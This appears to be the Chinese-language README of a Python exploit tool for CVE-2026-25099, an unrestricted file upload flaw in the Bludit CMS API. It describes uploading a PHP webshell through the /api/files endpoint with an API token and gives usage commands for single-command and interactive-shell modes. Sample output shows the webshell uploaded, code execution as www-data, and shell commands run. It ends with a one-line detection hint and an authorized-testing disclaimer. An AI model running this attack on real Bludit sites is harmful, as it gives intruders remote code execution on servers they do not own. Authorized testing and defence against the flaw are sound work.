
Python 漏洞利用程序,针对 Bludit CMS API 无限制文件上传漏洞,可导致远程代码执行,提供命令执行和交互式 Shell,用于授权测试。
Bludit CMS 3.18.4 之前的版本允许持有有效 API 令牌的已认证攻击者通过 POST /api/files/<page-key> 端点上传任意类型和扩展名的文件。uploadFile() 函数不执行任何文件扩展名或内容验证,允许上传 PHP 网页木马并以 www-data 权限执行。
# 单条命令执行
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" -c "id"
# 交互式 Shell
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN"
[*] CVE-2026-25099 - Bludit CMS API 文件上传导致 RCE
[*] 目标: http://target
[*] 获取页面密钥...
[+] 页面密钥: create-your-own-content
[*] 上传网页木马...
[+] 木马已上传: http://target/bl-content/uploads/pages/create-your-own-content/abcdefgh.php
[*] 验证 RCE...
[+] RCE 已确认: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] 交互式 Shell(输入 'exit' 退出)
shell> whoami
www-data
shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php
define('BLUDIT_VERSION', '3.18.2');

/bl-content/uploads/ 目录中是否有意外的 PHP 文件Yahia Hamza - https://yh.do
本工具仅供授权的安全测试和教育目的使用。请负责任地使用,并且仅针对您拥有测试权限的系统。